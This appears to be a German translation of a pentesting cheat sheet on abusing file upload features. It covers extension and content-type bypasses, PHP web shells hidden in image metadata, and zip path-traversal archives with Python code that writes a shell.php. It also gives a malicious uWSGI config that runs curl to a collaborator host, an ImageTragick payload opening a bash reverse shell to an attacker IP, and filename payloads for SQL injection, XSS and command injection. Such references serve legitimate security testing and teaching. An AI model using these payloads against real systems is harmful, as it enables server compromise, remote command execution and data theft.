Wenn Sie an einer Hackerkarriere interessiert sind und das Unhackbare hacken möchten - wir stellen ein! (fließendes Polnisch in Wort und Schrift erforderlich).

Allgemeine Methodik zum Datei-Upload

Andere nützliche Erweiterungen:

• PHP: .php, .php2, .php3, .php4, .php5, .php6, .php7, .phps, .phps, .pht, .phtm, .phtml, .pgif, .shtml, .htaccess, .phar, .inc, .hphp, .ctp, .module

• Arbeiten in PHPv8: .php, .php4, .php5, .phtml, .module, .inc, .hphp, .ctp

• ASP: .asp, .aspx, .config, .ashx, .asmx, .aspq, .axd, .cshtm, .cshtml, .rem, .soap, .vbhtm, .vbhtml, .asa, .cer, .shtml

• Jsp: .jsp, .jspx, .jsw, .jsv, .jspf, .wss, .do, .action

• Coldfusion: .cfm, .cfml, .cfc, .dbm

• Flash: .swf

• Perl: .pl, .cgi

• Erlang Yaws Web Server: .yaws

Umgehung von Dateierweiterungsprüfungen

1. Wenn sie angewendet werden, überprüfen Sie die vorherigen Erweiterungen. Testen Sie sie auch mit einigen Großbuchstaben: pHp, .pHP5, .PhAr ...

2. Überprüfen Sie, ob Sie eine gültige Erweiterung vor der Ausführungserweiterung hinzufügen können (verwenden Sie auch vorherige Erweiterungen):

• file.png.php

• file.png.Php5

3. Versuchen Sie, Sonderzeichen am Ende hinzuzufügen. Sie könnten Burp verwenden, um alle ASCII- und Unicode-Zeichen bruteforce zu verwenden. (Beachten Sie, dass Sie auch die zuvor genannten Erweiterungen verwenden können)

• file.php%20

• file.php%0a

• file.php%00

• file.php%0d%0a

• file.php/

• file.php.\

• file.

• file.php....

• file.pHp5....

4. Versuchen Sie, die Schutzmaßnahmen zu umgehen, indem Sie den Erweiterungsparser auf der Serverseite mit Techniken wie dem Verdoppeln der Erweiterung oder dem Hinzufügen von Junk-Daten (Null-Bytes) zwischen den Erweiterungen täuschen. Sie können auch die vorherigen Erweiterungen verwenden, um eine bessere Nutzlast vorzubereiten.

• file.png.php

• file.png.pHp5

• file.php#.png

• file.php%00.png

• file.php\x00.png

• file.php%0a.png

• file.php%0d%0a.png

• file.phpJunk123png

5. Fügen Sie eine weitere Schicht von Erweiterungen zur vorherigen Überprüfung hinzu:

• file.png.jpg.php

• file.php%00.png%00.jpg

6. Versuchen Sie, die Ausführungserweiterung vor der gültigen Erweiterung zu platzieren und hoffen Sie, dass der Server falsch konfiguriert ist. (nützlich, um Apache-Fehlkonfigurationen auszunutzen, bei denen alles mit der Erweiterung** .php, aber nicht unbedingt mit .php endet** Code ausführen wird):

• z. B.: file.php.png

7. Verwenden von NTFS-Alternativen Datenströmen (ADS) in Windows. In diesem Fall wird ein Doppelpunkt ":" nach einer verbotenen Erweiterung und vor einer erlaubten eingefügt. Dadurch wird eine leere Datei mit der verbotenen Erweiterung auf dem Server erstellt (z. B. "file.asax:.jpg"). Diese Datei kann später bearbeitet werden, indem andere Techniken wie die Verwendung ihres Kurznamens verwendet werden. Das Muster "::$data" kann auch verwendet werden, um nicht leere Dateien zu erstellen. Daher kann das Hinzufügen eines Punktzeichens nach diesem Muster auch nützlich sein, um weitere Einschränkungen zu umgehen (z. B. "file.asp::$data.")

8. Versuchen Sie, die Dateinamenbeschränkungen zu umgehen. Die gültige Erweiterung wird abgeschnitten, und das bösartige PHP bleibt übrig. AAA<--SNIP-->AAA.php

# Linux maximal 255 Bytes
/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 255
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4 # hier 4 abziehen und .png hinzufügen
# Laden Sie die Datei hoch und überprüfen Sie die Antwort, wie viele Zeichen erlaubt sind. Angenommen, 236
python -c 'print "A" * 232'
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
# Erstellen Sie die Nutzlast
AAA<--SNIP 232 A-->AAA.php.png

Umgehen von Content-Type, Magic Number, Komprimierung & Größenänderung

• Umgehen Sie Content-Type-Überprüfungen, indem Sie den Wert des Content-Type-Headers auf setzen: image/png, text/plain, application/octet-stream

1. Content-Type Wortliste: https://github.com/danielmiessler/SecLists/blob/master/Miscellaneous/web/content-type.txt

• Umgehen Sie die Magic Number-Überprüfung, indem Sie am Anfang der Datei die Bytes eines echten Bildes hinzufügen (um den file-Befehl zu verwirren). Oder führen Sie die Shell in die Metadaten ein: exiftool -Comment="<?php echo 'Befehl:'; if($_POST){system($_POST['cmd']);} __halt_compiler();" img.jpg \ oder Sie könnten auch das Payload direkt in ein Bild einfügen: echo '<?php system($_REQUEST['cmd']); ?>' >> img.png

• Wenn Komprimierung zu Ihrem Bild hinzugefügt wird, z.B. durch die Verwendung einiger Standard-PHP-Bibliotheken wie PHP-GD, sind die zuvor genannten Techniken nicht nützlich. Sie könnten jedoch den PLTE-Chunk hier definierte Technik verwenden, um Text einzufügen, der die Komprimierung überleben wird.

• Github mit dem Code

• Die Webseite könnte auch das Bild verkleinern, z.B. mit den PHP-GD-Funktionen imagecopyresized oder imagecopyresampled. Sie könnten jedoch den IDAT-Chunk hier definierte Technik verwenden, um Text einzufügen, der die Komprimierung überleben wird.

• Github mit dem Code

• Eine weitere Technik, um ein Payload zu erstellen, der eine Bildverkleinerung überlebt, ist die Verwendung der PHP-GD-Funktion thumbnailImage. Sie könnten jedoch den tEXt-Chunk hier definierte Technik verwenden, um Text einzufügen, der die Komprimierung überleben wird.

• Github mit dem Code

Weitere Tricks zur Überprüfung

• Finden Sie eine Schwachstelle, um die bereits hochgeladene Datei umzubenennen (um die Erweiterung zu ändern).

• Finden Sie eine Schwachstelle für Local File Inclusion, um die Backdoor auszuführen.

• Mögliche Informationsfreigabe:

1. Laden Sie mehrmals (und gleichzeitig) die gleiche Datei mit dem gleichen Namen hoch

2. Laden Sie eine Datei mit dem Namen einer Datei oder eines Ordners hoch, der bereits existiert

3. Laden Sie eine Datei mit “.”, “..” oder “…” als Namen hoch. Zum Beispiel, in Apache in Windows, wenn die Anwendung die hochgeladenen Dateien im Verzeichnis “/www/uploads/” speichert, wird die Datei mit dem Namen “.” eine Datei namens “uploads” im Verzeichnis “/www/” erstellen.

4. Laden Sie eine Datei hoch, die möglicherweise nicht leicht gelöscht werden kann, wie “…:.jpg” in NTFS. (Windows)

5. Laden Sie eine Datei in Windows mit ungültigen Zeichen wie |<>*?” in ihrem Namen hoch. (Windows)

6. Laden Sie eine Datei in Windows unter Verwendung von reservierten (verbotenen) Namen wie CON, PRN, AUX, NUL, COM1, COM2, COM3, COM4, COM5, COM6, COM7, COM8, COM9, LPT1, LPT2, LPT3, LPT4, LPT5, LPT6, LPT7, LPT8 und LPT9 hoch.

• Versuchen Sie auch, eine ausführbare Datei (.exe) oder eine .html (weniger verdächtig) hochzuladen, die Code ausführt, wenn sie versehentlich vom Opfer geöffnet wird.

Spezielle Erweiterungstricks

Wenn Sie versuchen, Dateien auf einen PHP-Server hochzuladen, schauen Sie sich den .htaccess-Trick an, um Code auszuführen. Wenn Sie versuchen, Dateien auf einen ASP-Server hochzuladen, schauen Sie sich den .config-Trick an, um Code auszuführen.

Die .phar-Dateien sind wie die .jar-Dateien für Java, aber für PHP und können wie eine PHP-Datei verwendet werden (durch Ausführen mit PHP oder Einbinden in ein Skript...).

Die Erweiterung .inc wird manchmal für PHP-Dateien verwendet, die nur zum Import von Dateien dienen, sodass jemand irgendwann diese Erweiterung zur Ausführung zugelassen haben könnte.

Jetty RCE

Wenn Sie eine XML-Datei auf einen Jetty-Server hochladen können, können Sie RCE erhalten, da neue *.xml- und *.war-Dateien automatisch verarbeitet werden. Laden Sie also wie in folgendem Bild erwähnt die XML-Datei in $JETTY_BASE/webapps/ hoch und erwarten Sie die Shell!

uWSGI RCE

Für eine detaillierte Erkundung dieser Schwachstelle lesen Sie die Originalforschung: uWSGI RCE Exploitation.

Remote Command Execution (RCE)-Schwachstellen können in uWSGI-Servern ausgenutzt werden, wenn man die .ini-Konfigurationsdatei ändern kann. uWSGI-Konfigurationsdateien verwenden eine spezifische Syntax, um "magische" Variablen, Platzhalter und Operatoren einzubeziehen. Insbesondere der '@'-Operator, der als @(Dateiname) verwendet wird, ist dazu gedacht, den Inhalt einer Datei einzuschließen. Unter den verschiedenen unterstützten Schemata in uWSGI ist das "exec"-Schema besonders mächtig und ermöglicht das Lesen von Daten aus der Standardausgabe eines Prozesses. Diese Funktion kann für böswillige Zwecke wie Remote Command Execution oder Arbitrary File Write/Read manipuliert werden, wenn eine .ini-Konfigurationsdatei verarbeitet wird.

Betrachten Sie das folgende Beispiel einer schädlichen uwsgi.ini-Datei, die verschiedene Schemata zeigt:

[uwsgi]
; read from a symbol
foo = @(sym://uwsgi_funny_function)
; read from binary appended data
bar = @(data://[REDACTED])
; read from http
test = @(http://[REDACTED])
; read from a file descriptor
content = @(fd://[REDACTED])
; read from a process stdout
body = @(exec://whoami)
; curl to exfil via collaborator
extra = @(exec://curl http://collaborator-unique-host.oastify.com)
; call a function returning a char *
characters = @(call://uwsgi_func)

Die Ausführung der Nutzlast erfolgt während des Parsens der Konfigurationsdatei. Damit die Konfiguration aktiviert und geparst wird, muss der uWSGI-Prozess entweder neu gestartet werden (möglicherweise nach einem Absturz oder aufgrund eines Denial-of-Service-Angriffs) oder die Datei muss auf automatisches Neuladen eingestellt sein. Das automatische Neuladen, wenn aktiviert, lädt die Datei in festgelegten Intervallen neu, wenn Änderungen erkannt werden.

Es ist entscheidend, die lockere Natur des Konfigurationsdatei-Parsings von uWSGI zu verstehen. Insbesondere kann die diskutierte Nutzlast in eine Binärdatei (wie ein Bild oder PDF) eingefügt werden, was den Umfang potenzieller Ausnutzungen weiter ausdehnt.

wget Datei-Upload/SSRF-Trick

In einigen Fällen kann es vorkommen, dass ein Server wget zum Herunterladen von Dateien verwendet und Sie die URL angeben können. In diesen Fällen überprüft der Code möglicherweise, ob die Erweiterung der heruntergeladenen Dateien in einer Whitelist enthalten ist, um sicherzustellen, dass nur erlaubte Dateien heruntergeladen werden. Diese Überprüfung kann jedoch umgangen werden. Die maximale Länge eines Dateinamens in Linux beträgt 255, jedoch kürzt wget die Dateinamen auf 236 Zeichen. Sie können eine Datei namens "A"*232+".php"+".gif" herunterladen, dieser Dateiname wird die Überprüfung umgehen (da in diesem Beispiel ".gif" eine gültige Erweiterung ist), aber wget wird die Datei in "A"*232+".php" umbenennen.

#Create file and HTTP server
echo "SOMETHING" > $(python -c 'print("A"*(236-4)+".php"+".gif")')
python3 -m http.server 9080

#Download the file
wget 127.0.0.1:9080/$(python -c 'print("A"*(236-4)+".php"+".gif")')
The name is too long, 240 chars total.
Trying to shorten...
New name is AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.php.
--2020-06-13 03:14:06--  http://127.0.0.1:9080/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.php.gif
Connecting to 127.0.0.1:9080... connected.
HTTP request sent, awaiting response... 200 OK
Length: 10 [image/gif]
Saving to: ‘AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.php’

AAAAAAAAAAAAAAAAAAAAAAAAAAAAA 100%[===============================================>]      10  --.-KB/s    in 0s

2020-06-13 03:14:06 (1.96 MB/s) - ‘AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.php’ saved [10/10]

Beachten Sie, dass eine weitere Option, die Sie möglicherweise in Betracht ziehen, um diese Überprüfung zu umgehen, darin besteht, den HTTP-Server auf eine andere Datei umzuleiten, sodass die ursprüngliche URL die Überprüfung umgeht und wget dann die umgeleitete Datei mit dem neuen Namen herunterlädt. Dies funktioniert nicht, es sei denn, wget wird mit dem Parameter --trust-server-names verwendet, da wget die umgeleitete Seite mit dem Namen der Datei herunterlädt, der in der ursprünglichen URL angegeben ist.

Werkzeuge

• Upload Bypass ist ein leistungsstarkes Tool, das entwickelt wurde, um Pentestern und Bug Bounty Jägern beim Testen von Datei-Upload-Mechanismen zu helfen. Es nutzt verschiedene Bug-Bounty-Techniken, um den Prozess der Identifizierung und Ausnutzung von Schwachstellen zu vereinfachen und eine gründliche Bewertung von Webanwendungen sicherzustellen.

Von Datei-Upload zu anderen Schwachstellen

• Setzen Sie den Dateinamen auf ../../../tmp/lol.png und versuchen Sie, eine Pfadtraversierung zu erreichen

• Setzen Sie den Dateinamen auf sleep(10)-- -.jpg und Sie könnten eine SQL-Injektion erreichen

• Setzen Sie den Dateinamen auf <svg onload=alert(document.domain)>, um ein XSS zu erreichen

• Setzen Sie den Dateinamen auf ; sleep 10;, um einige Befehlsinjektionen zu testen (mehr Befehlsinjektionstricks hier)

• XSS in Bild (svg) Datei-Upload

• JS Datei Upload + XSS = Service Workers Ausnutzung

• XXE in svg-Upload

• Offene Weiterleitung durch das Hochladen einer svg-Datei

• Versuchen Sie verschiedene svg Payloads von https://github.com/allanlw/svg-cheatsheet****

• Berühmte ImageTrick-Schwachstelle

• Wenn Sie den Webserver anweisen können, ein Bild von einer URL abzurufen, könnten Sie versuchen, einen SSRF auszunutzen. Wenn dieses Bild auf einer öffentlichen Website gespeichert wird, könnten Sie auch eine URL von https://iplogger.org/invisible/ angeben und Informationen von jedem Besucher stehlen.

• XXE und CORS Umgehung mit PDF-Adobe-Upload

• Speziell präparierte PDFs für XSS: Die folgende Seite zeigt, wie man PDF-Daten einspeist, um JS-Ausführung zu erhalten. Wenn Sie PDFs hochladen können, könnten Sie einige PDFs vorbereiten, die beliebigen JS ausführen werden, den Anweisungen folgend.

• Laden Sie den [eicar](https://secure.eicar.org/eicar.com.txt) Inhalt hoch, um zu überprüfen, ob der Server ein Antivirus hat

• Überprüfen Sie, ob es eine Größenbeschränkung beim Hochladen von Dateien gibt

Hier ist eine Top-10-Liste von Dingen, die Sie durch das Hochladen erreichen können (von hier):

1. ASP / ASPX / PHP5 / PHP / PHP3: Webshell / RCE

2. SVG: Gespeichertes XSS / SSRF / XXE

3. GIF: Gespeichertes XSS / SSRF

4. CSV: CSV-Injektion

5. XML: XXE

6. AVI: LFI / SSRF

7. HTML / JS : HTML-Injektion / XSS / Offene Weiterleitung

8. PNG / JPEG: Pixel-Flutangriff (DoS)

9. ZIP: RCE über LFI / DoS

10. PDF / PPTX: SSRF / BLIND XXE

Burp-Erweiterung

Magische Header-Bytes

• PNG: "\x89PNG\r\n\x1a\n\0\0\0\rIHDR\0\0\x03H\0\xs0\x03["

• JPG: "\xff\xd8\xff"

Siehe https://en.wikipedia.org/wiki/List_of_file_signatures für andere Dateitypen.

Zip/Tar-Datei automatisch dekomprimierter Upload

Wenn Sie eine ZIP-Datei hochladen können, die auf dem Server dekomprimiert wird, können Sie 2 Dinge tun:

Symlink

Laden Sie einen Link hoch, der symbolische Links zu anderen Dateien enthält, und greifen Sie dann auf die dekomprimierten Dateien zu, um auf die verknüpften Dateien zuzugreifen:

ln -s ../../../index.php symindex.txt
zip --symlinks test.zip symindex.txt
tar -cvf test.tar symindex.txt

Dekomprimieren in verschiedenen Ordnern

Die unerwartete Erstellung von Dateien in Verzeichnissen während der Dekomprimierung ist ein erhebliches Problem. Trotz anfänglicher Annahmen, dass diese Konfiguration möglicherweise vor der Ausführung von Befehlen auf OS-Ebene durch bösartige Datei-Uploads schützt, können die hierarchische Komprimierungsunterstützung und die Verzeichnis-Traversal-Fähigkeiten des ZIP-Archivformats ausgenutzt werden. Dies ermöglicht es Angreifern, Beschränkungen zu umgehen und sichere Upload-Verzeichnisse zu verlassen, indem sie die Dekomprimierungsfunktionalität der angegriffenen Anwendung manipulieren.

Ein automatisierter Exploit zum Erstellen solcher Dateien ist unter evilarc auf GitHub verfügbar. Das Dienstprogramm kann wie folgt verwendet werden:

# Listing available options
python2 evilarc.py -h
# Creating a malicious archive
python2 evilarc.py -o unix -d 5 -p /var/www/html/ rev.php

Zusätzlich ist der Symlink-Trick mit Evilarc eine Option. Wenn das Ziel darin besteht, eine Datei wie /flag.txt anzugreifen, sollte ein Symlink zu dieser Datei in Ihrem System erstellt werden. Dies stellt sicher, dass Evilarc während seines Betriebs keine Fehler meldet.

Im Folgenden finden Sie ein Beispiel für Python-Code, der verwendet wird, um eine bösartige Zip-Datei zu erstellen:

#!/usr/bin/python
import zipfile
from io import BytesIO

def create_zip():
f = BytesIO()
z = zipfile.ZipFile(f, 'w', zipfile.ZIP_DEFLATED)
z.writestr('../../../../../var/www/html/webserver/shell.php', '<?php echo system($_REQUEST["cmd"]); ?>')
z.writestr('otherfile.xml', 'Content of the file')
z.close()
zip = open('poc.zip','wb')
zip.write(f.getvalue())
zip.close()

create_zip()

Ausnutzung der Kompression für Dateisprühung

Für weitere Details überprüfen Sie den Originalbeitrag unter: https://blog.silentsignal.eu/2014/01/31/file-upload-unzip/

1. Erstellen einer PHP-Shell: PHP-Code wird geschrieben, um Befehle auszuführen, die über die $_REQUEST-Variable übergeben werden.

<?php
if(isset($_REQUEST['cmd'])){
$cmd = ($_REQUEST['cmd']);
system($cmd);
}?>

2. Dateisprühung und Erstellung komprimierter Dateien: Es werden mehrere Dateien erstellt und ein Zip-Archiv wird erstellt, das diese Dateien enthält.

root@s2crew:/tmp# for i in `seq 1 10`;do FILE=$FILE"xxA"; cp simple-backdoor.php $FILE"cmd.php";done
root@s2crew:/tmp# zip cmd.zip xx*.php

3. Änderung mit einem Hex-Editor oder vi: Die Namen der Dateien innerhalb des Zip-Archivs werden mit vi oder einem Hex-Editor geändert, indem "xxA" in "../" geändert wird, um Verzeichnisse zu durchqueren.

:set modifiable
:%s/xxA/..\//g
:x!

ImageTragic

Laden Sie diesen Inhalt mit einer Bildendung hoch, um die Schwachstelle auszunutzen (ImageMagick, 7.0.1-1) (aus dem Exploit)

push graphic-context
viewbox 0 0 640 480
fill 'url(https://127.0.0.1/test.jpg"|bash -i >& /dev/tcp/attacker-ip/attacker-port 0>&1|touch "hello)'
pop graphic-context

Einbetten einer PHP-Shell in PNG

Das Einbetten einer PHP-Shell im IDAT-Chunk einer PNG-Datei kann bestimmte Bildverarbeitungsoperationen effektiv umgehen. Die Funktionen imagecopyresized und imagecopyresampled von PHP-GD sind in diesem Zusammenhang besonders relevant, da sie häufig für das Ändern der Größe und das Neuberechnen von Bildern verwendet werden. Die Fähigkeit der eingebetteten PHP-Shell, von diesen Operationen unberührt zu bleiben, ist ein bedeutender Vorteil für bestimmte Anwendungsfälle.

Eine ausführliche Erkundung dieser Technik, einschließlich ihrer Methodik und potenziellen Anwendungen, wird in folgendem Artikel bereitgestellt: "Web-Shells in PNG IDAT-Chunks codieren". Diese Ressource bietet ein umfassendes Verständnis des Prozesses und seiner Auswirkungen.

Mehr Informationen unter: https://www.idontplaydarts.com/2012/06/encoding-web-shells-in-png-idat-chunks/

Polyglotte Dateien

Polyglotte Dateien dienen als einzigartiges Werkzeug in der Cybersicherheit und fungieren als Chamäleons, die gleichzeitig in mehreren Dateiformaten gültig existieren können. Ein faszinierendes Beispiel ist ein GIFAR, eine Hybridform, die sowohl als GIF als auch als RAR-Archiv funktioniert. Solche Dateien sind nicht auf diese Kombination beschränkt; Kombinationen wie GIF und JS oder PPT und JS sind ebenfalls möglich.

Der Kernnutzen von polyglotten Dateien liegt in ihrer Fähigkeit, Sicherheitsmaßnahmen zu umgehen, die Dateien basierend auf ihrem Typ überprüfen. Eine gängige Praxis in verschiedenen Anwendungen besteht darin, nur bestimmte Dateitypen für den Upload zuzulassen - wie JPEG, GIF oder DOC - um das Risiko durch potenziell schädliche Formate (z. B. JS, PHP oder Phar-Dateien) zu mindern. Ein Polyglott kann jedoch, indem es den strukturellen Kriterien mehrerer Dateitypen entspricht, diese Beschränkungen heimlich umgehen.

Trotz ihrer Anpassungsfähigkeit stoßen Polyglotte auf Einschränkungen. Beispielsweise kann ein Polyglott gleichzeitig eine PHAR-Datei (PHp ARchive) und ein JPEG verkörpern, aber der Erfolg seines Uploads könnte von den Dateierweiterungsrichtlinien der Plattform abhängen. Wenn das System strenge Richtlinien für zulässige Erweiterungen hat, reicht die bloße strukturelle Dualität eines Polyglotten möglicherweise nicht aus, um seinen Upload zu garantieren.

Mehr Informationen unter: https://medium.com/swlh/polyglot-files-a-hackers-best-friend-850bf812dd8a

Referenzen

• https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Upload%20insecure%20files

• https://github.com/modzero/mod0BurpUploadScanner

• https://github.com/almandin/fuxploider

• https://blog.doyensec.com/2023/02/28/new-vector-for-dirty-arbitrary-file-write-2-rce.html

• https://www.idontplaydarts.com/2012/06/encoding-web-shells-in-png-idat-chunks/

• https://medium.com/swlh/polyglot-files-a-hackers-best-friend-850bf812dd8a

Wenn Sie an einer Hackerkarriere interessiert sind und das Unhackbare hacken möchten - wir stellen ein! (fließendes Polnisch in Wort und Schrift erforderlich).